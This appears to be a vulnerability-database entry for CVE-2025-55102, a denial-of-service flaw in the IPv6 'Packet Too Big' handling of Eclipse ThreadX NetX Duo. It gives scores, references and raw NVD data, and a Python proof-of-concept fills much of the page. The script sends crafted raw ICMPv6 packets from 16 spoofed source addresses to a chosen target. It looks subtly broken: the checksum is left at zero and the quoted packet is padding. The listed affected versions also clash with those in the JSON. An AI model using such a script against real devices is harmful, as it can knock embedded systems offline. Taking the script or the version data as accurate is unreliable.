CVE-2025-55102

Description

A denial-of-service vulnerability exists in the NetX IPv6 component functionality of Eclipse ThreadX NetX Duo. A specially crafted network packet of "Packet Too Big" with more than 15 different source address can lead to denial of service. An attacker can send a malicious packet to trigger this vulnerability.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:eclipse:threadx_netx_duo:*:*:*:*:*:*:*:* - VULNERABLE

Eclipse ThreadX NetX Duo < 6.4.1

Eclipse ThreadX NetX Duo < 6.3.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-55102 PoC - Eclipse ThreadX NetX Duo IPv6 DoS
This PoC demonstrates sending a malicious ICMPv6 Packet Too Big message
with multiple source addresses to trigger the denial of service.
"""

import socket
import struct
import random

def create_icmpv6_packet_too_big(source_addrs, target_addr):
    """
    Create a malicious ICMPv6 Packet Too Big message with multiple source addresses.
    """
    # ICMPv6 type for Packet Too Big is 2
    icmp_type = 2
    # ICMPv6 code
    icmp_code = 0
    # MTU value (should be less than actual packet size)
    mtu = 1280
    
    # ICMPv6 checksum (placeholder - needs proper calculation in real scenario)
    checksum = 0
    
    # Build ICMPv6 Packet Too Big message
    icmp_data = struct.pack('>I', mtu)  # MTU
    icmp_data += b'\x00' * 28  # Original packet header + data (truncated)
    
    # ICMPv6 header
    icmp_header = struct.pack('>BBH', icmp_type, icmp_code, checksum)
    icmp_packet = icmp_header + icmp_data
    
    # IPv6 header for Packet Too Big message
    # Use one of the source addresses as the packet source
    src_addr = source_addrs[0] if source_addrs else '2001:db8::1'
    
    # Create pseudo-header for checksum calculation
    payload_length = len(icmp_packet)
    next_header = 58  # ICMPv6
    
    # IPv6 header construction
    version_class_flow = struct.pack('>I', 0x60000000)
    payload_length_packed = struct.pack('>H', payload_length)
    next_header_packed = struct.pack('>B', next_header)
    hop_limit = struct.pack('>B', 255)
    
    # Convert addresses to bytes
    src_addr_bytes = socket.inet_pton(socket.AF_INET6, src_addr)
    dst_addr_bytes = socket.inet_pton(socket.AF_INET6, target_addr)
    
    ipv6_header = (version_class_flow + payload_length_packed + 
                   next_header_packed + b'\x00' + hop_limit + 
                   src_addr_bytes + dst_addr_bytes)
    
    return ipv6_header + icmp_packet

def send_malicious_packets(target_ip, interface='eth0'):
    """
    Send malicious Packet Too Big messages to trigger CVE-2025-55102.
    """
    try:
        sock = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW)
        
        # Generate 16+ different source addresses
        source_addrs = []
        for i in range(16):
            addr = f'2001:db8::{random.randint(1, 0xffff):04x}:{random.randint(1, 0xffff):04x}'
            source_addrs.append(addr)
        
        print(f'[*] Target: {target_ip}')
        print(f'[*] Number of source addresses: {len(source_addrs)}')
        print(f'[*] Sending malicious Packet Too Big messages...')
        
        # Send multiple packets with different source addresses
        for i, src_addr in enumerate(source_addrs):
            packet = create_icmpv6_packet_too_big([src_addr], target_ip)
            sock.sendto(packet, (target_ip, 0))
            print(f'[+] Sent packet {i+1}/{len(source_addrs)} from {src_addr}')
        
        print('[*] Attack completed')
        sock.close()
        
    except Exception as e:
        print(f'[-] Error: {e}')

if __name__ == '__main__':
    import sys
    if len(sys.argv) < 2:
        print(f'Usage: {sys.argv[0]} <target_ipv6>')
        sys.exit(1)
    
    target = sys.argv[1]
    send_malicious_packets(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-55102
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-55102
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-55102/
[4] VulDB https://vuldb.com/cve/CVE-2025-55102
[5] https://github.com/eclipse-threadx/netxduo/security/advisories/GHSA-f3rx-xrwm-q2rf

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-55102", "sourceIdentifier": "[email protected]", "published": "2026-01-27T16:16:15.113", "lastModified": "2026-04-02T20:30:19.657", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A denial-of-service vulnerability exists in the NetX IPv6 component functionality of Eclipse ThreadX NetX Duo. A specially crafted network packet of \"Packet Too Big\" with more than 15 different source address can lead to denial of service. An attacker can send a malicious packet to trigger this vulnerability."}, {"lang": "es", "value": "Hay una vulnerabilidad de denegación de servicio en la funcionalidad del componente NetX IPv6 de Eclipse ThreadX NetX Duo. Un paquete de red especialmente diseñado de 'Packet Too Big' con más de 15 direcciones de origen diferentes puede provocar una denegación de servicio. Un atacante puede enviar un paquete malicioso para activar esta vulnerabilidad."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-400"}, {"lang": "en", "value": "CWE-404"}, {"lang": "en", "value": "CWE-770"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:threadx_netx_duo:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.4.5.202504", "matchCriteriaId": "6498C3CB-1DAB-44E7-A3BD-D56B55629B6B"}]}]}], "references": [{"url": "https://github.com/eclipse-threadx/netxduo/security/advisories/GHSA-f3rx-xrwm-q2rf", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}